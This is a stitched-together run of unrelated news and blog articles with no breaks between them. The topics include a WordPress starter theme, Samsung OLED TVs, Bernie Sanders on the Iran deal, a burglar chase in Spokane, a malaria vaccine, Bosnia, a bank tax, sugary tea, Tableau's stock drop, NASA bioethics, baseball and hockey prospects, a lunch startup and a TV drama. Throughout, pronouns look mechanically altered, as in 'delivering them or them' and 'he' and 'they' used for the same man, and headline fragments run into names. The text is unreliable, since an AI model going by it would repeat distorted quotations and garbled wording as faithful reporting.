Some Like it Neat is a new starter theme for WordPress, based on the popular ultra-minimal Underscores theme. It also incorporates Bourbon, a lightweight mixin library for Sass. On top of that it adds Neat, which applies a semantic grid framework for Sass and Bourbon, enabling you to build any responsive layout that you can dream up.
Since Some Like It Neat is a simple starter theme, there's not much to see in the screenshot, apart from a relatively blank canvas, waiting to be shaped and styled.
The power of this theme lies in the tools that it incorporates. Some Like It Neat expedites the creation of a modern frontend development workflow for WordPress theming with responsive grids and a few prepackaged styles. The theme offers support for the following tools:
Bourbon: A simple and lightweight mixin library for Sass
Neat: A lightweight semantic grid framework for Sass and Bourbon
Bitters: Scaffold styles, variables and structure for Bourbon projects
Refills: Prepackaged patterns and components, built on top of Bourbon, Bitters, and Neat
Bower: A frontend package manager
This is essentially everything you need for a Bourbon-soaked development workflow. Developers starting with this theme should already be familiar with Sass, since it's the foundation for using Bourbon and Neat. If you need a Sass primer, Sitepoint has a great tutorial on the basics. WP Beginner also has a quick introduction to help WordPress theme designers get started with Sass.
Some Like It Neat also allows for Gulp.js task automation. Alex Vasquez, the theme's creator, says that this feature still has room for improvement. The theme currently includes support for the following tasks:
gulp watch – Starts up Gulp and watches your scss, js and php folder for changes, writes them out and refreshes the browser for you
– Starts up Gulp and watches your scss, js and php folder for changes, writes them out and refreshes the browser for you gulp build – Removes unnecessary files and packs up the required files into a nice and neat, installable, zip package
Additionally, Some Like It Neat adds support for the Theme Hook Alliance (THA), a community-driven project that offers a standardized set of third-party action hooks to theme developers to implement for more flexibility. THA has a growing list of compatible themes. Vasquez opted for adding it to help keep things within the theme cleaner and easier to maintain.
Why Use Bourbon and Neat?
Incorporating Bourbon and its parallel projects into your WordPress theme is a matter of personal preference. In the past, Vasquez had used frontend frameworks such as Bootstrap and Foundation, but after discovering Bourbon+Neat, they found that it gave them a more efficient approach to theme creation:
To achieve the responsiveness required of various projects, I would have to tear up my HTML, input my own selector classes and what have you, in addition to changing my CSS. I didn't like it. I heard about Neat and really liked its approach to a grid framework. You keep your HTML structure the way you like and all of the styling in your Sass files.
If that sounds like a better workflow for you, then you may want to set aside some time to give this starter theme a try. It can be used as a parent theme from which you create a highly customized child theme. Vasquez has outlined how to get started in the documentation, which will walk you through installing Node, Sass, Gulp.js, etc. They also posted a handy folder structure as an example for how projects are structured with the starter theme.
Some Like It Neat is Alex Vasquez‘s first submission to the official WordPress Themes Directory. You can download it via your admin theme browser or from its GitHub repository.
Like this: Like Loading...
Earlier this month we heard reports that Samsung Display is expected to make a final decision regarding a future OLED TV panel production facility investment. Today SDC confirms that it will proceed with projects for the development of large-sized OLED displays, although the company's focus remains on small-sized OLEDs.
According to Merck, Samsung will indeed return to the OLED TV market, and will do so by 2017. Samsung released their first OLED TV, the KN55S9C, back in June 2013. The TV was available worldwide for a short time for around $10,000, and then dropped to around $6,000 (and even lower) - but Samsung soon stopped production and never released another TV. In 2014 Samsung officials repeatedly said that Samsung will not resume OLED TV production until 2016 or 2017, which coincides with Merck's estimates.
Sen. Bernie Sanders Bernard (Bernie) SandersPush to end U.S. support for Saudi war hits Senate setback Sanders: 'I fully expect' fair treatment by DNC in 2020 after 'not quite even handed' 2016 primary Sanders: 'Damn right' I'll make the large corporations pay 'fair share of taxes' MORE (I-Vt.) praised the administration on Tuesday for reaching a final deal on Iran's nuclear program, calling it "a victory for diplomacy over saber-rattling."
“I congratulate President Obama, Secretary [John] Kerry and the leaders of other major nations for producing a comprehensive agreement to prevent Iran from obtaining a nuclear weapon," Sanders, who is running for president, said in a statement, adding that the deal "could keep the United States from being drawn into another never-ending war in the Middle East."
ADVERTISEMENT
Negotiators from seven countries, including the United States and Iran, on Tuesday announced a final deal that will swap sanctions relief for restrictions on Iran's nuclear program.
Like many of their Democratic colleagues, Sanders added that they look forward to reviewing the bill "to make sure that it is effective and strong."
Once the administration hands over the text of the agreement to lawmakers, they'll have 60 days to vote on a resolution to approve or disapprove the deal, or do nothing.
Sanders's 2016 competitor, former Secretary of State Hillary Clinton Hillary Diane Rodham ClintonSanders: 'I fully expect' fair treatment by DNC in 2020 after 'not quite even handed' 2016 primary Sanders: 'Damn right' I'll make the large corporations pay 'fair share of taxes' Former Sanders campaign spokesperson: Clinton staff are 'biggest a--holes in American politics' MORE, also cautiously offered support for the deal on Tuesday.
"This is an important step in putting a lid on Iran's nuclear program," Clinton told reporters.
When Jared Martin was awakened in the middle of the night, they found a suspected burglar snooping around their home. When the suspect ran away, Martin, whose home had been burglarized the night before, wasn't about to let them go and chased them down, eventually catching them and holding them at gunpoint until police arrived.
The Spokesman-Review reports that the incident happened on April 30 in Spokane, Washington It was about 3:00 a.m. when Martin and their wife woke up, and they admitted that he's unsure what exactly it was that disturbed their slumber. Martin, a National Guardsman who served in Iraq and Kuwait, grabbed their gun and went to look outside. At first glance, they did not see anyone, only a bicycle leaning against their fence. But hanging on the bicycle was a backpack that had been taken from Martin's garage just the night before.
Martin went back inside their home to call Crime Check concerning the report that included the missing backpack. Only before doing so, they decided to go outside once more. It was at that point that they spotted a man standing on the other side of the fence. Martin pointed their pistol at them and told them to come closer into the light, to which the man responded, “No, I can't go back to jail.” The man ran off, but Martin chased after him, wearing only shorts and flip flops, still clutching their pistol.
Martin eventually caught up to the man and grabbed them by the hood of their sweatshirt, pulling them to the ground. They then dragged the man back to their house, where their wife, Heather, had already called the police. Martin held the man at gunpoint until police arrived a few minutes later. Once police arrived, it took several officers to get the man into handcuffs.
The suspect, who was identified as 21-year-old Christopher Tremain, was charged with two counts of burglary.
The bicycle in Tremain's possession, which was recently stolen, turned out to belong to Martin's neighbor. Some of the Martins' belongings were recovered from the backpack on the bicycle, although they are still missing over $1,000 worth of tools and motorcycle gear.
Although Martin said that they never saw them, officers did find that Tramain had several knives on him.
While some are calling Martin a hero for their actions, others are criticizing them for chasing the suspect down, citing that as the job of law enforcement, not citizens.
In the state of Washington, there is no specific Castle Doctrine Law, but there is also no duty to retreat. In other words, if there is an immediate threat you are not required by law to retreat into your home to avoid any danger. The home “includes any building, dwelling … or any real property.”
The law also allows the use of force “whenever necessarily used by a person arresting one who has committed a felony and delivering them or them to a public officer competent to receive them or them into custody.” Residential burglary is considered a Class B Felony in Washington state. The law also allows force “whenever reasonably used by a person to detain someone who enters or remains unlawfully in a building or on real property lawfully in the possession of such person, so long as such detention is reasonable in duration and manner to investigate the reason for the detained person's presence on the premises, and so long as the premises in question did not reasonably appear to be intended to be open to members of the public.”
Do you think Martin did the right thing in pursuing the burglar or should they have just let the burglar flee?
A vaccine against malaria could be introduced in the world's worst-hit countries in 2015, after the latest trial of a treatment produced by Britain's biggest drug company reduced the number of cases of the disease experienced by babies.
The results of trials published on Tuesday in Durban, South Africa, showed that the RTS,S vaccine developed by GlaxoSmithKline nearly halved the cases of malaria experienced by children aged between five and seven months and cut the number of cases in babies aged 6 to 12 weeks by a quarter.
The treatment's protection lasted for 18 months, although it waned slightly over time, and while that is not the sort of efficacy that parents in Europe or the US are used to getting in the vaccines given to their children, the malaria vaccine would make a significant difference to the outlook for those in areas where the tropical disease is rife.
Every year, around 660,000 people die from malaria, most of them small children under the age of five. There are about 219m cases of the disease a year worldwide, and children who survive the serious illness can suffer damage to their health and development in their lifetime afterwards.
Sir Andrew Witty, chief executive of GSK, said the company was very encouraged by the latest results and would now apply for a regulatory licence for its use in Africa under a special provision of the European Medicines Agency. "While we have seen some decline in vaccine efficacy over time, the sheer number of children affected by malaria means that the number of cases of the disease the vaccine can help prevent is impressive," they said.
Duncan Learmouth, GSK's senior vice- president for developing countries and market access, said that if malaria were as serious a problem in the UK as it was in Africa, the company would be seeking a licence for this vaccine in spite of its limited efficacy.
"I'm not sure it would be different if the impact of the disease was as it is in Africa. If we were looking at a disease in Europe and the US that had a similar clinical impact and burden on the health services, I actually think we would be pressing ahead for this," they said.
Inventing a malaria vaccine has involved breaking new medical ground. This is the first-ever vaccine against a parasite, said Learmouth. There are other novel vaccines in development, such as one from the US that involves injecting patients with weakened parasites, but Learmouth insisted GSK was not rushing to get a licence because it feared competitors.
"We're really not. I think the nearest vaccine is still in phase one – there is a huge long way to go. This is a very complex area. I don't expect a competitor vaccine for a very long time," they said.
GSK says the vaccine will be not-for-profit – but it will add 5% to the cost price which will go towards further research and development work on tropical diseases. The pharmaceutical giant has spent $350m (£218m) on the vaccine so far and expects to invest $260m more before it reaches children. A team of 40 people will be needed to process the 1m pages of paperwork out of the many trials, which were held in seven Africa countries in different age groups. The Bill and Melinda Gates Foundation also put in about $200m.
The dossier will go to the European Medical Agency next year and if it gets its licence, will go to the World Health Organisation for approval. It is expected that the donor-funded GAVI – the Global Alliance for Vaccines and Immunisation – will eventually pick up the bill for vaccine programmes as the treatment is deployed in malarial countries. Because the vaccine appears to be more effective in infants from five months of age, it may not be given at the same time as the basic immunisation for babies, such as diphtheria, whooping cough and tetanus, but later, like measles and pneumococcal vaccine. The introduction of a booster jab, at 18 months, is now also being trialled to see if it can increase the duration of the vaccine's protection.
The treatment was developed with the US-based non-profit PATH Malaria Vaccine Initiative. David Kaslow, vice president, product development at PATH, said the limited efficacy of the vaccine must be put in context. There has been great progress with bed nets and other technical measures, "yet there is still a huge disease burden out there", they said. In that context, the vaccine has "a potentially significant public health impact". During the trials, they pointed out, there were 941 cases of malaria averted for every 1,000 children vaccinated.
Dr Lucas Otieno of the Kenya Medical Research Institute-Walter Reed Project, who has been involved in the trials from 2005, cautioned that the good medical care that all participating children were given – they were seen by doctors as soon as any symptoms developed – may have prevented many malaria cases becoming serious. So it was possible, they cautioned, that the vaccine was more effective than appeared in the trials. However, Otieno added that there had been no shortage of volunteers for the trial from families for whom malaria was a permanent fear. "The volunteers were keen across all the sites," they said. "In my site, we had 1,631 children and we recruited the initial 1,000 within about three months, which was very impressive."
Early in President Obama's first term, in May 2009, Vice President Joseph R. Biden Jr. paid a visit to Sarajevo, the capital of Bosnia and Herzegovina. Addressing Parliament, they told Bosnian, Serbian and Croatian members, “My country is worried. ... We have seen a sharp and dangerous rise in nationalist rhetoric.” Such inflammatory speech, they said, “must stop.” Otherwise, they warned, “You will descend into the ethnic chaos that defined your country for a decade.”
Since then, other than the inauguration of a new American Embassy in Sarajevo by Secretary of State Hillary Rodham Clinton in 2010, there has been little engagement by the United States and no follow-up to Mr. Biden's words. Instead, the situation Mr. Biden described is being enacted: Bosnia is slipping back into a dangerous sectarianism.
Milorad Dodik, president of Republika Srpska, the Bosnian Serb entity, is rewriting the narrative of the war — claiming that Muslims started it. Mr. Dodik denies Serbian responsibility for genocide in the 1995 Srebrenica massacre of 8,000 Muslim men and boys; they recently testified on behalf of the former Bosnian Serb leader Radovan Karadzic, on trial in The Hague for war crimes.
Eighteen years ago, it was American diplomacy, backed by force, that ended Europe's most savage conflict since World War II. The 1995 peace treaty forged in Dayton, Ohio, stopped ethnic cleansing — the term coined in those Balkan wars — and gave birth to a new country. Now, while Bosnia and Herzegovina's fragile unity is fraying, the international community is as disengaged as when war first erupted in 1992. The United States has much at stake; it needs to return to Sarajevo.
>There is a theater-of-the-ironic element in Scott Brown's "victory" on the bank tax. They successfully removed from the financial bill a $19 billion tax on banks with more than $50 billion in assets and on hedge funds with $10 billion or more. Instead, about half the revenue to pay for reform will come from a stealth tax -- in the form of higher FDIC deposit insurance premiums. (The required ratio of cash to expected exposure will increase 20 basis points from 1.15 percent to 1.35 percent.)
One key banking lobbyist told me that "the net effect is the same ... this is a fixed cost and it could mean higher fees or fewer loans." It also will hit a much larger group of banks. The old tax would have targeted just the mega-institutions that played the biggest role in making the financial mess. The new stealth tax socks all banks with $10 billion or more in assets -- many of which avoided irresponsible lending practices and fancy investment instruments -- charging them $5.7 billion in higher premiums. (Because more banks pay, the huge banks get away with paying less.) Even though the policy will not go into full effect for ten years, costs could rise much sooner -- at a time when all banks are under greater pressure than ever to make more loans and get credit flowing again. And hedge funds seem to be spared any new tax at all.
So Scott Brown the populist crusader, the protector of the middle class, the most popular politician in Massachusetts, has pushed a policy that probably means lower taxes for Wall Street, higher premiums for Main Street banks, and less lending to small businesses.
We want to hear what you think about this article. Submit a letter to the editor or write to letters@theatlantic.com.
When Tea Is As Sweet As Soda: Sugary Tea Around The World
Sugar and tea have a love story that goes way back.
As The Salt's Maria Godoy has written, they are a "power couple that altered the course of history. It was a marriage shaped by fashion, health fads and global economics," and, of course, the slave trade.
Tea, especially black tea, is bitter. A lot of people decided it tasted better with sugar and made a habit out of adding it.
"I suspect that sugar has always been added to make the strong tea more palatable and also for energy, especially where milk or cream is added, too," Jane Pettigrew, a tea historian in the UK and co-author of The New Tea Companion, tells us. "In Britain during the Industrial Revolution, the poorer classes drank very weak tea, but added milk and sugar for sustenance."
Plenty of other tea lovers around the world concur that sugar adds sustenance and flavor: From Morocco to Taiwan to Germany to Iraq to the Deep South of the U.S., you'll find tea so sweet it'll make you wince if you're not used to it.
The trouble is, a lot of us are well-fed and don't need extra sustenance from sugar anymore. And over time, as sugar has become cheaper and more abundant, we've added more and more of it to our tea (and to a lot of other things we consume).
And so tea, which we think of as healthful, even longevity-promoting, has become pretty unhealthful in a lot of places. A 16-ounce grande Starbucks Chai Tea Latte, for example, contains 42 grams of sugar, or 10.5 teaspoons
Rob van Dam, associate professor of medicine at the National University of Singapore, says sugary tea is becoming increasingly popular in Asia. "It's there in the bubble teas, the ice teas, the Starbucks tea lattes – they're all high in sugar. People think, 'I'm not going for a Coke, I'll take an iced tea.' But the difference in sugar content is marginal."
van Dam says all that sugary tea is a big part of why sugar intake in Asia and other tea-loving regions of the world is swiftly climbing. And it doesn't bode well for people's health. "We have seen Western studies showing that sugar-sweetened beverages are associated with a high risk of diabetes and excess weight gain," they say.
But despite the health risks, sugary tea is a beloved ritual around the world. Here's our round-up of just a few of the world's sweetest tea traditions.
Moroccan/Western Saharan Mint Tea
In 2012, I traveled to Western Sahara, a disputed territory of Morocco, with a group of journalists. As I reported then, I was struck by how drinking tea – green tea with fresh mint – was so central to North African culture. But what perhaps most shocked me was the quantity of sugar that went into to each batch: huge chunks, the size of golf balls. And as one local told me, Saharawis will drink tea four times a day, and maybe more if it's a day filled with meetings. That's a lot of sugar.
Southern Sweet Tea
As Georgia native Tracy Thompson once wrote in their book The New Mind of the South, you can define the South as the place where there's sugar in the tea and not in the cornbread.
Enter any given home in the South on a hot afternoon, and there's a pretty good chance you'll be offered an icy glass of tea. If you're accustomed to iced tea made in other parts of the U.S., be warned: This stuff is really, really sweet. (Some recipes call for a quarter cup of sugar per cup of water.)
As iconic as Southern sweet tea is, it's also become a marker of unhealthy dietary patterns in the region. Suzanne Judd is an associate professor in the School of Public Health at the University of Alabama at Birmingham who has documented a strong link between the Southern-style diet (fried food, processed meat and sweet tea) and risk of stroke. In small towns in the south, Judd says, sweet tea is the default beverage. And it's really hard to wean people off it.
"It's not soda that's the devil down here, it's sweet tea," they say. "There's no way of knowing how much sugar goes in it — they boil it to super concentrate the sugar."
German East Frisian Tea
The people of East Frisia, Germany take their tea seriously, too. They prefer it strong and black with thick cream and rock sugar in the bottom of the cup, which are never stirred in, says Pettigew. According to one German tea company,
"The locals refer to tea made this way with the trilling alliteration 'n lekker Koppke Tee" (a delicious cup of tea). The flavor is malty, strong, spicy, and highly aromatic. Protocol demands that the tea must never be stirred in the cup, because the true sensory experience comes in three layers: first the cream (sky), then the tea infusion (water) and finally the sweetness of the sugar (land)."
If you happen to go to this region, you can visit the East Frisian Tea Museum.
Enlarge this image toggle caption Sabah Arar/AFP/Getty Images Sabah Arar/AFP/Getty Images
Iraqi Chai
Many Iraqis simmer their tea for about 15 minutes until it's very strong. Then, says Pettigrew, they pour it into glasses with sugar and dilute it with hot water. "A glass of sweet tea is handed to a guest with the sugar undissolved in the bottom of the glass," they say.
According to The Iraqi Family Cookbook, extra sugar cubes are sometimes served on the side.
What: A broad group of stocks related to big data and cloud-based analytics have gotten utterly crushed today after Tableau Software (NYSE:DATA) reported disappointing earnings and issued soft guidance. As of 12:30 p.m. ET, Tableau was down 48%, salesforce.com (NYSE:CRM) was down 12%, Splunk (NASDAQ:SPLK) was down 22%, NetSuite (NYSE:N) was down 12%, Workday (NASDAQ:WDAY) was down 12%, and Qlik Technologies (NASDAQ:QLIK) was down 15%.
So what: Last night, Tableau said total revenue was $202.8 million, including $133.1 million in license revenue. By the time you got to the bottom line, investors were looking at adjusted earnings per share of $0.33. Tableau added 3,600 new customer accounts during the quarter, bringing its global customer base to 39,000. Technically, the quarter topped consensus estimates of $200.8 million up top and $0.16 per share in adjusted profit down low, but there were some critical areas where Tableau missed.
Now what: License revenue came in below expectations, suggesting that competition from larger players is starting to chip away at Tableau's early lead in data visualization. Even worse, Tableau cut guidance for both the current quarter and the full year, and some of the comments on the conference call contributed to the sectorwide bloodbath.
This quarter should see revenue in the range of $160 million to $165 million, well below the Street's expectation of $179.5 million. Tableau is reducing its full-year outlook, now expecting sales to come in between $830 million to $850 million, down rom a prior range of $845 million to $865 million, which was already below the $871.5 million that analysts were expecting. Operating margins will be pressured this year as Tableau plans to make 2016 an "investment year."
But here's the part that really applies to Tableau's peers. CFO Tom Walker noted that there was noticeable "softness" within enterprise spending trends, particularly in North America. Some customers are increasing usage, but at a slower rate than the company has enjoyed historically. Tableau's conservative outlook is based on the buying patterns that it's seeing from enterprise customers.
Considering current market volatility and investor skittishness, combined with a wide range of global macroeconomic fears, Tableau's remarks are causing investors to flee the sector, particularly those stocks with high valuation multiples.
Imagine you had a severely injured astronaut on the surface of Mars — or a dead body. American soldiers will put themselves at great risk to retrieve a dead body. On Mars, you have a different situation. You might be endangering the entire mission by trying to retrieve the body. In that case, you might recommend that it be left behind, even if that is against our ethical traditions.
Or what do you do if someone has a psychotic episode while in space?
I've written that there has to be medication and restraints on the craft. If you have to restrain the person for a long period of time, you have to do it. You can't thank the person for their service to the country and put them out into space. You can't medicate them to insensibility for a year and a half. You have to find a reasonable way to manage the situation.
Photo
Q. YOU MENTIONED EARLIER THAT NASA DOES BIOMEDICAL RESEARCH IN SPACE. HOW DO THE ASTRONAUTS FEEL ABOUT BEING RESEARCH SUBJECTS?
A. For the most part, they want to help. There have been some who, in some situations, have refused. They are covered by something called the Common Rule, which includes the right to withdraw from an experiment at any time or to refuse to participate, without penalty — as any human research subject in the United States would be.
Astronauts have refused experiments that interfered with their getting enough sleep while in space — it's very hard to sleep in microgravity. Others opted out because they were concerned that medical information collected on them couldn't really be private and might interfere with their getting health insurance after retirement. But on a flight with seven people, if one opts out, you've cut your research population significantly. This led an advisory panel to suggest a “modification of the interpretation” of the Common Rule for astronauts.
Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content , updates and promotions from The New York Times. You may opt out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters.
I thought that the Common Rule was our most basic protection for human research subjects and said it was a mistake to erode it. I recommended that what NASA should do is continue to increase something they'd already started to do — involve the astronauts in every level of the research process. For a reasonable concern like health insurance, I suggested that NASA offer lifetime insurance to the astronauts, which they are trying to now do. It's a comparatively low-cost way to solve a problem. To this date, there's been no modification of interpretation of the Common Rule for astronauts.
Q. WHAT WAS THE MOST UNUSUAL QUESTION NASA HAS POSED TO YOU?
A. It wasn't an ethical question, it was a religious one. My father, the late Gerald Wolpe, was a rabbi, as are two of my brothers. There had been an Israeli on the crew of the Columbia shuttle. After it broke up, NASA wanted to know about Jewish religious standards in regard to gathering and interring remains. NASA teams were recovering pieces of bodies on the ground in Texas and Louisiana, much of it unidentifiable. And NASA wanted to know if the Israeli government would want only Ilan Ramon's flesh returned to it because, if so, NASA would have to do genotyping of every piece of tissue. That would take months.
I told them there were countervailing values. In Judaism you bury the body as soon as possible. I didn't think the Israelis would want to have months and months pass.
Advertisement Continue reading the main story
I've since heard that a lot of the tissue buried in the various graves of these astronauts was unidentified. There's something touching that some of what is buried in each of their resting places is tissue from all of them.
Q. DID YOUR BECOMING A BIOETHICIST HAVE ANYTHING TO DO WITH YOUR FATHER'S WORK?
A. I think so. They were very involved in bioethics, even before it was a recognized field of study. They taught a course about death and dying at a medical school. At a time when there were few dialysis machines for people with kidney disease, they were on a state commission to decide who could get priority access to them. All of that came home in 1986, when my mother had a stroke and they became their primary caregiver. It made the whole family even more aware of the stresses caregivers suffer.
I was in graduate school at the time this happened, studying medical sociology. But I could see that this new field, bioethics, was rapidly developing. It combined everything I loved: medicine, the life sciences and the ethics I'd grown up with. For me, it was the perfect fit.
I dropped Medina's name in yesterday's post when rotation-mate Ranger Suarez was the Pitcher of the Day. Between the two, they took the electric out of the WV Power bats amassing 20 strikeouts in 14 total innings. Medina picked up a career-high 10 K's last night. The 20 year-old native out of the Dominican Republic had underwhelming stats last season for short-season Williamsport, but did post a 5-3 record with a 2.92 ERA. Though he's a raw arm, there was a concern about whether their stuff could miss enough bats to reach a ceiling as a starter. That concern has been quelled so far, with their low 90's heavy fastball with late action and a ferocious slider now averaging a K an inning. The #16 ranked Phillies prospect also possesses solid control with two very good breaking balls.
A new wave of startups, including companies like Blue Apron, Plated, HelloFresh and more, have been catering to consumers looking to cook healthier meals at home, but lack the time to shop and source the right ingredients. Today, a new service called Scrumpt is offering a similar option for kids – or rather, for their busy parents who want an easier way to pack a healthy school lunch.
This subscription-based service, debuting today at TechCrunch Disrupt SF, lets moms and dads choose from dozens of nutritionally sound lunch items from trusted companies which are combined with everyday staples, like apples and bananas, for example, to create the perfect packed lunch.
The idea for the startup comes from San Francisco-based mother and daughter team, Bri James and Dr. Schery Mitchell-James.
James, previously the director of strategic partnerships at a now-shuttered Bay Area startup Main Street, explains that they were looking for their next project right around the time their mother, Dr. Mitchell-James was retiring after working as a pediatrician for 36 years.
Together, the two decided to focus on something they had personal experience with during the time when James was a child – the ongoing struggle to choose healthy items for a bagged school lunch.
These days, American consumers are increasing concerned about the nutritionally-bereft food found on store shelves, as food producers have moved further away from natural ingredients, instead packing foods with unhealthy chemicals and preservatives, while adding so much sugar that America now suffers from an obesity epidemic.
That, in turn, has led many to become aware of the problem with today's food, and they're now shopping accordingly. McDonald's has been seeing a downturn, for example, while sales at chains like Whole Foods, which focuses on non-GMO products and other organics, are growing.
However, not everyone in the U.S. has the same access to healthy foods as others. Many live in more isolated regions, where organic food stores are simply nonexistent, while others rely on limited selections at more traditional grocery stores. Meanwhile, some parents want to shop for healthy items, but don't know how to parse nutritional labels. Other parents have the knowledge, but lack the time it takes to peruse the store aisles reading labels.
For all these potential customers, Scrumpt offers an alternative.
After develop a set of nutritional guidelines for the products it offers, Scrumpt today lets parents pick from a selection of 27 different lunch-ready options from a dozen different vendors, like 18 Rabbits, Beanitos and Good Health.
To get started, parents log into the Scrumpt website, enter in their payment information, and then choose from this wide variety of products in order to create their own, personalized lunch kits. Each kit contains three or five pre-portioned lunches which include a main dish, 1 or 2 sides, and a “worthwhile” treat, like a whole grain chocolate graham cracker or organic fruit chips, as well as a napkin and utensils.
You can also find gluten-free, lactose-free, or nut-free items, given your preferences.
These non-perishable or semi-perishable items like hummus, almond butter, cheddar crackers, granola, and pasta, are then augmented by items parents likely already buy – like fruits and veggies. A provided shopping list helps you round out your packed lunches, which you assemble at home or teach your child to do.
In addition, beginning today, Scrumpt will begin beta testing delivery of perishable items in San Francisco.
Three lunches cost $19 per week while 5 lunches are $24.
The founders admit this is more expensive than the heavily subsidized school lunch, but it's more in line with what parents who pack lunches themselves are already paying (i.e. $3-$5 per meal.)
Plus, adds Dr. Mitchell-James, “there's a lot more waste in the school lunch…The kids won't eat a lot of the stuff that's in the school lunch, so they come home hungry and eat more snacks,” they say.
Besides school lunches, Scrumpt also offers add-ons like after-school snack packs and travel kits that come with snacks and games. You can get 10 snacks for $18.95 or a single travel kit, which also includes things like coloring books, tissues, card games and more.
The idea to help parents make a healthier school lunch at its core is a good one, but the pricing could be a sticking point for many parents who are already struggling with the higher cost of buying healthy, organic foods.
Plus, much of what constitutes a healthy lunch is the fresh food – the whole fruits, berries, and veggies that should fill half your plate.
That means Scrumpt won't save parents a trip to the grocery store, outside of San Francisco where Scrumpt now ships perishables. And if customers are already shopping the aisles, then they'll likely have time to grab a few other items (at lower prices!) to round out their kids' healthy meals.
The bootstrapped startup is live now and ships items for free anywhere in the U.S.
[gallery ids="1213441,1213439,1213438"]
It's seems that every year – at least for the past few seasons – the OHL's London Knights and head coach Dale Hunter spit out handfuls of NHL first round picks. This season that role enveloped forward Mitch Marner.
Finishing second in the OHL's regular season scoring race with 126 points (44g-82a) in just 63 games, Marner is a sure bet to go in the top ten at the 2015 NHL Entry Draft. But who's the most likely to take the small forward from Thornhill, Ontario?
While there will be numerous teams eyeing the right winger, there are two clubs that could be front runners in drafting Marner – two teams that could have the right guys in place to develop the young forward. Both, are franchises currently sitting in the bottom four of the NHL standings.
From Hunter to Hunter, Reuniting With Mark
While it will depend on the draft lottery, and the availability of other players when their team is called to the table, the Toronto Maple Leafs could be a perfect landing spot for the London Knights' forward.
"That would be a dream come true for me” – Mitch Marner on being a Leaf. http://t.co/8i9hxpOIGk #2015NHLDraft — Scott Wheeler (@scottcwheeler) February 26, 2015
Sure, the Leafs are in the market for a solid centre that can step in as a number one in the years to come, but how do you turn down a speedy scoring winger like Marner? You can't.
On top of that, the Leafs brought in Mark Hunter earlier this year as the director of player personnel – a move that many says is one of the best by the franchise in some time.
“Best hire the Leafs have made,” said Knights goalie coach Bill Dark in a piece by Sportsnet's Damien Cox. “He understands hockey from every different angle.”
But it isn't just former employees and members of the London franchise that expressed their praise for the member of the Leafs front office.
“He works hard and he's all over the place,” said Warren Rychel, the GM for the Windsor Spitfires, in the Cox article. “When we started in Windsor we had to find a way to get to the level they were at.”
Now aside from spitting out a number of NHL stars – Rick Nash and Patrick Kane among others – Mark Hunter has a history with Marner. Drafted by the Knights, Marner played for the Hunter brothers in 2013-14 and under their development team until Mark's departure from the team.
There's no chemistry with possible teammates in Toronto – at least not yet – but there is a relationship with the director of player personnel and that could play a role in the development of the small forward.
While size could be an issue for Marner, the importance of that particular attribute is changing in the NHL and they could be a strong addition to a Toronto franchise that is looking to find their offence after a dismal second half of the 2014-15 season.
Marner: Finding Chemistry in the Desert
The other franchise that could consider Marner as a top four picks in the upcoming draft is the Arizona Coyotes. While they're in the running for either Connor McDavid or Jack Eichel, there remains potential for their pick to drop to number three.
So, why not think ahead to the future? If the Coyotes did indeed draft Marner, that would mark the second year in the last three the team drafted a London Knight in the first round. Grabbing Marner would also give them the option of pairing them up with current teammate Max Domi – providing the team with some existing chemistry.
Now, certainly Marner isn't a favourite to be taken by the Coyotes with their top-three pick. But it wouldn't be the worst pick by a team looking for anything to spark offence and build for the future.
In fact, one analyst explains how Marner has an innate ability to read the game and beat players one-on-one.
“Combine skill, smarts and confidence and you have Mitch. An excellent playmaker who can make plays in and through the tightest of spaces. Very elusive with their skating but can attack and beat defenders one-on-one. They see plays unfolding and is very comfortable holding the puck to allow them to develop. Plays with an assuredness that is threatening and they don't take a ‘back seat' in the game.”
– Craig Button, TSN's Director of Scouting
While Marner is projected in the five or six slots in the draft, their performance this season could garner some more consideration with the third or fourth picks. Yes he's a small guy, but as Button explains, he's got skill and vision worthy of a top five pick.
For more, follow Andrew on Twitter at @AndrewGForbes or their THW column at @Tape2TapeTHW.
It was winter 1989, and the Rose Noelle was three days into a voyage to Tonga when it became lost at sea. 119 days later, the crew - John Glennie, Rick Hellriegel, Jim Nalepka and Phil Hoffman -re-appeared, long after being given up for dead.
More than 25 years later, their story is being revived in the form of a two-part drama starring Kiwi stars Greg Johnson, Peter Feeney and Owen Black, alongside US-based Aussie Dominic Purcell.
The four actors got a taste of what their real-life counterparts would have gone through, spending upwards of 10 hours a day filming in the water.
Supplied The cast of Abandoned spent weeks at sea, as their real-life counterparts would have.
For Johnson (The Insatiable Moon, Agent Anna), it was a chance to revisit the same story only on film instead of stage, though they quickly found the shoot far more demanding.
"The physical aspects were extreme. We were in water - sometimes we had to lie in it for hours, other times completely submerged in it. We were on an upturned boat in relatively high seas for weeks ,10 hours a day," they say.
"There is nowhere to sit, you have to stand or lean on the upturned hull - it's like you're queuing, but...there is no beginning or end - just the ocean."
Feeney (Black Sheep) had a better time of things, striving on the action rather than being stuck in a studio. They talk about their days on set with a kind of glee almost, recounting everything from the joys of growing a beard to stories they won't tell to a journalist, but from the look in their eye would've made a great gag-reel.
"Mega-stud action-hero Dominic (Purcell) going into a panic attack about exit strategies should our upturned boat start to sink, Owen Black chundering their guts out between takes...looking at the other actors and thinking 'they look like homeless people' then realizing I looked the same," are all on their list of fond memories.
Action star Purcell (Prison Break, Equilibrium, Blade: Trinity) plays Jim Nalepka, an American traveller, "a bit of a vagabond", who was asked by John Glenny to join the excursion as cook.
They say for him, it wasn't the physical demands that got them so much as the mental ones.
"Just the confinement - it was an exact replica of the actual Rose Noelle and there were four of us in there, and we just didn't have any room to do anything. On top of that, you had four, five camera guys in there. We were squashed and the thing became like a hot box, it was really intense," they say.
"Then we spent two, three weeks out at sea and the problem with that was, we did the exterior, so we're sitting on top of the boat spending 12 to 14 hours out at sea with nowhere to go, so we were more or less stuck there all day long and the monotony and the mental fatigue of that was just really hard to deal with."
The plus side, they say, was as actors they gained extremely realistic "trigger points" to give them insight into their characters and what they must have gone through.
That and it gave the Aussie-born actor a chance to return down under, where they say the story telling is just, well, better.
"It's always nice to come down to this part of the world. My sensibilities are very Australian, of course. I grew up there, so I understand the ways of the Aussies and the New Zealanders - we're all a very similar people," they say.
"I'm always intrigued and interested to be involved in Australian and New Zealand films because the filtering system is so intense. Unlike America, where - because they've got so much money they can produce so much shit, whereas here, when they do make films they're usually of a high standard and usually have important things to say."
